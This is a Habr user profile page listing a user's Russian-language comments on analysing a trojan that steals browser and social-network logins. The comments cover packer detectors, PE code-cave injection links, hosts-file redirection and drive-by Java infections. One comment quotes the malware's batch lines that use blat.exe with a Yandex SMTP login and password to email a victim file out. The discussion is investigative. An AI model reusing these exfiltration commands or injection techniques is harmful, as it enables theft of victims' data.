Как стать автором
Обновить
57
0
Дмитрий @Onthar

Пользователь

Отправить сообщение
Шифровать он начинает в случае попыток анализа, чтобы нагадить, я пологаю. Основной его функционал все таки — перехват пост-запросов из браузеров.
blogs.cisco.com/wp-content/uploads/wireshark-wm.png
Конечно, на упаковщик сработал — тот еще герой)
А вот вам и реклама этой партнерки: forum.antichat.ru/thread296720.html
Угу, и дата там 4 июля.
Кстати, совсем забыл про RDG Packer Detector.
rdgsoft.8k.com/
Тоже постоянно обновляемая мощная тулза.
пароль на яндексе менять бесполезно — без ответа на q/a не возможно сменить серкетный вопрос, а следовательно возврат почты — дело одной минуты.

Аналог PEiD есть — это Exeinfo PE. Обновляется регулярно. В данный момент оф.сайт почему-то недоступен.
Есть в PE-файлах так называемые CodeCave так вот туда можно не только данные вписать, но и вполне рабочий ассемблерный код.
Есть статья на англицком: www2.inf.fh-bonn-rhein-sieg.de/~ikarim2s/how2injectcode/code_inject.html
И ее перевод: www.xaker.name/forvb/showthread.php?t=22158

Ну и хекс-редактором можно в пустые области записывать данные, это в секции ресурсов, как правило. Тут скорее от конкретного файла зависит. Я не особо разбирался с этим, если честно.
blat.exe -install -server smtp.yandex.ru -port 587 -f ufanetcom2@yandex.ru -u ufanetcom2 -pw javascriptscэто строка в батнике install.bat записывает в реестр аккаунт, с которого отсылается почта.
%SYSTEMROOT%/help/win32/blat.exe %systemroot%/help/win32/ip.txt -to ufanetcom2@yandex.ru. exitэта строка отправляет указанный файл на указанный адрес.
письмо отправилось на свой же ящик.

Да и просниффать можно элементарно, тут же нет ssl.
Не нравится мне переход на третий питон, когда последний раз «трогал» calculate — приходилось маскировать третью ветку. Тут как? третий питон уже в коробке?
Сайт злоумышленника лег под хабраэффектом))

Кстати из всей хвори, что выкачивают лоадеры, попался и сниффер учеток соц.сетей. До конца еще не разобрался, но похоже, что вредонос поднимает веб-сервер или прокси, пропускающую через себя траффик по определенным в файле hosts доменам. То есть в файле hosts нашел записи вида 127.0.0.1 vk.com, при этом сайты работают. А при вводе данных в поля авторизации происходит отправка содержимого форм «налево».

Отсюда и спам, отсюда и комментарии на стенах от знакомых людей.
peid, exe info pe вроде бы, нету сейчас возможности проверить.
Вполне возможно, что это фальшивая сигнатура.
Это одна из жертв вируса.
Могут быть использованы так называемые drive-by атаки на браузер. Возможно, не совсем верно выразился, но я сталкивался с подобным. При переходе на сайт производится попытка запустить ява-апплет. Под виндой загрузка ява апплета включала видео-ролик, а на фоне скачивала и запускала трояна.
На ютуб я заливал демонстрацию этого безобразия: www.youtube.com/watch?v=G-JSVGCEML8
У меня были подозрения, что используется какой-то конвертер, вроде bat 2 exe и прочих, но руки перепробовать все пока что не дошли.
Поставил тачку жены обновляться, через пару часов поглядим, чем они нас порадуют.
На семерке вредонос запросит администраторских прав (UAC вылезет), а при открытии блокнота двойным кликом, он запускается с правами пользователя, прав у которого на правку системного файла не хватит. Так вот запускать его нужно правым кликом -> Запуск от имени администратора.
Собственно, это имелось виду, забыл уточнить.
во всяком случае, я ввел просто по нескольку единиц в поля.
При вводе рандомных символов уже предлогали сменить пароль. Проверки нету даже на наличие символа "@" в поле «Логин»

Информация

В рейтинге
Не участвует
Откуда
Россия
Дата рождения
Зарегистрирован
Активность